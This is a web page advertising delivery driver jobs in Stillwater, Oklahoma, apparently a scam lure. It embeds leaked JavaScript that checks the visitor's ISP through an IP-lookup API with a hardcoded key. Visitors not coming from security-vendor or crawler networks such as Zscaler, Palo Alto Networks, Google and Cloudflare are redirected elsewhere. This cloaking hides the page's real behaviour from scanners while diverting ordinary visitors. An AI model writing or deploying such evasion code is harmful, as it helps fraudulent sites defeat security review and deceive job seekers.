Restaurant Delivery – Sign Up in Minutes
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
Join our team as a Restaurant Delivery Driver in Stillwater, Oklahoma!
Enjoy flexible hours and the opportunity to earn competitive pay by delivering delicious meals to customers.
Responsibilities:
- Pick up orders from restaurants and deliver them promptly to customers’ locations.
- Ensure accurate order delivery and maintain high customer satisfaction.
- Follow navigation and traffic laws to ensure safe transportation.
- Communicate professionally with customers and team members.
- Maintain a clean and reliable delivery vehicle (if applicable).
Skills Needed:
- Valid driver’s license and reliable transportation.
- Good time management and navigation skills.
- Excellent communication and customer service skills.
- Ability to work independently and handle multiple deliveries efficiently.
Benefits:
- Flexible scheduling to fit your lifestyle.
- Earn tips and competitive delivery pay.
- Opportunity to work in a dynamic, fast-paced environment.
- Supportive team and growth opportunities.